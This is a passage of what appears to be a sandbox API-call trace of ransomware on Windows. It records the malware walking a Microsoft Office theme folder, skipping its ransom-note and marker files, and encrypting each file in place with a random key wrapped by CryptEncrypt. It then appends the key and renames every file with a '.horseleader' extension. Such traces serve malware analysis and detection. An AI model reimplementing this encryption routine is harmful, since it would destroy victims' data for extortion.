fuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.150] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.150] CloseHandle (hObject=0x158) returned 1 [0246.150] 
GetProcessHeap () returned 0x780000 [0246.151] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.151] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BLUECALM", cAlternateFileName="")) returned 1 [0246.151] lstrcmpiW (lpString1="BLUECALM", lpString2="Windows") returned -1 [0246.151] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM") returned 68 [0246.151] lstrcmpW (lpString1="BLUECALM", lpString2=".") returned 1 [0246.151] lstrcmpW (lpString1="BLUECALM", lpString2="..") returned 1 [0246.151] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.151] GetProcessHeap () returned 0x780000 [0246.151] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.151] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*") returned 70 [0246.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, 
ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.152] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.152] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\.") returned 70 [0246.152] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.152] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.152] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.152] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\..") returned 71 [0246.152] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.152] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.152] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c2ae00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x5f775610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe6c2ae00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xc2ba, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLUECALM.ELM", cAlternateFileName="")) returned 1 [0246.152] lstrcmpiW (lpString1="BLUECALM.ELM", 
lpString2="Windows") returned -1 [0246.152] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM") returned 81 [0246.152] StrStrIW (lpFirst="BLUECALM.ELM", lpSrch=".horseleader") returned 0x0 [0246.152] lstrcmpW (lpString1="BLUECALM.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.152] lstrcmpW (lpString1="BLUECALM.ELM", lpString2="_uninstalling_.png") returned 1 [0246.153] lstrlenW (lpString=".testttjffg") returned 11 [0246.153] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM", lpSrch=".testttjffg") returned 0x0 [0246.153] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.153] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.153] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM") returned 81 [0246.154] StrStrW (lpFirst="BLUECALM.ELM", lpSrch=".txt") returned 0x0 [0246.154] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=49850) returned 1 [0246.154] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.156] SetFilePointerEx (in: 
hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.157] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.158] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.158] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.158] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.158] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x22ba, lpOverlapped=0x0) returned 1 [0246.159] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffdd46, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.159] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x22ba, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x22ba, lpOverlapped=0x0) returned 1 [0246.159] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.159] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.159] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.159] CloseHandle (hObject=0x1a4) returned 1 [0246.160] GetProcessHeap () returned 0x780000 [0246.160] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.160] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM.horseleader") returned 93 [0246.160] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.elm.horseleader")) returned 1 [0246.165] GetProcessHeap () returned 0x780000 [0246.165] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.165] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x227, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLUECALM.INF", cAlternateFileName="")) returned 1 [0246.165] lstrcmpiW (lpString1="BLUECALM.INF", lpString2="Windows") returned -1 [0246.165] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF") returned 81 [0246.165] StrStrIW (lpFirst="BLUECALM.INF", lpSrch=".horseleader") returned 0x0 [0246.165] lstrcmpW (lpString1="BLUECALM.INF", lpString2="#Decrypt#.txt") returned 1 [0246.165] lstrcmpW (lpString1="BLUECALM.INF", lpString2="_uninstalling_.png") returned 1 [0246.165] lstrlenW (lpString=".testttjffg") returned 11 [0246.165] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF", lpSrch=".testttjffg") returned 0x0 [0246.165] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.165] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.166] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.166] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF") returned 81 [0246.167] StrStrW (lpFirst="BLUECALM.INF", lpSrch=".txt") returned 0x0 [0246.167] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=551) returned 1 [0246.168] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x227, lpOverlapped=0x0) returned 1 [0246.169] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0246.169] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x227, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x227, lpOverlapped=0x0) returned 1 [0246.169] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.170] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.170] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.170] CloseHandle (hObject=0x1a4) returned 1 [0246.170] GetProcessHeap () returned 0x780000 [0246.170] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.170] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF.horseleader") returned 93 [0246.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\BLUECALM.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\bluecalm.inf.horseleader")) returned 1 [0246.180] GetProcessHeap () returned 0x780000 [0246.180] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.180] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6d2cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.180] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.180] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 80 [0246.180] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.180] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.180] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.180] lstrlenW (lpString=".testttjffg") returned 11 [0246.180] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.180] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.180] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.180] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.181] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF") returned 80 [0246.181] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.181] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1560) returned 1 [0246.181] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x618, lpOverlapped=0x0) returned 1 [0246.184] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff9e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x618, lpOverlapped=0x0) returned 1 [0246.184] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.184] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.185] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.185] CloseHandle (hObject=0x1a4) returned 1 [0246.185] GetProcessHeap () returned 0x780000 [0246.185] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.185] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.horseleader") returned 92 [0246.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\preview.gif.horseleader")) returned 1 [0246.186] GetProcessHeap () returned 0x780000 [0246.186] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.186] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x80f1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.186] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.186] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 81 [0246.186] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.187] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.187] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.187] lstrlenW (lpString=".testttjffg") returned 11 [0246.187] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.187] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.187] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.187] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 81 [0246.188] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.188] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=33009) returned 1 [0246.188] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.191] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.191] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.192] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x30f1, lpOverlapped=0x0) returned 1 [0246.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcf0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x30f1, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x30f1, lpOverlapped=0x0) returned 1 [0246.192] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.192] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.193] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.193] CloseHandle (hObject=0x1a4) returned 1 [0246.193] GetProcessHeap () returned 0x780000 [0246.193] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.193] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.horseleader") returned 93 [0246.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.horseleader")) returned 1 [0246.194] GetProcessHeap () returned 0x780000 [0246.194] HeapFree 